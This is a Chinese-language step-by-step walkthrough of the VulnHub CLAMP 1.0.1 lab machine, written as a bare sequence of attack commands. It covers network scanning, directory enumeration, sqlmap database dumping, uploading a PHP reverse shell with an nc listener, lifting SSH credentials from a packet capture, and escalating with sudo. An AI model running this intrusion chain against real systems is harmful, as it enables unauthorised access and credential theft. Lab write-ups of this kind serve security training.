1、靶机地址
CLAMP: 1.0.1 ~ VulnHub
2、漏洞复现
sudo arp-scan -l
nmap -p- 192.168.159.164 --min-rate=5000
http://192.168.159.164
dirb http://192.168.159.164
http://192.168.159.164/nt4stopc
最终获得二进制:0110111001
拼接访问:
http://192.168.159.164/nt4stopc/0110111001
会跳转到
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/
点击Recommended Resorts右下角的新闻时,会跳转到
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1
sqlmap注入:
python3 sqlmap.py -u "http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --batch
python3 sqlmap.py -u "http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --batch -D tatil --dump
hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf
hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf
解密
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
拼接访问:
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php
发现没有提交按钮,自己创建一个
<input name='up' type='submit'>
出现上传按钮,同时发现文件名以md5值命名
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php #IP修改为kali
echo -n "php-reverse-shell.php" | md5sum
2ad6bded962b884337eaeb921d7c2764
上传php-reverse-shell.php
kali开启监听
nc -lvvp 1234
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php
成功反弹shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /var/www/html
ls
http://192.168.159.164/important.pcapng
下载下来进行流量分析
email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work.
mklpc-osas112.
ssh mkelepce@192.168.159.164
mklpc-osas112.
sudo su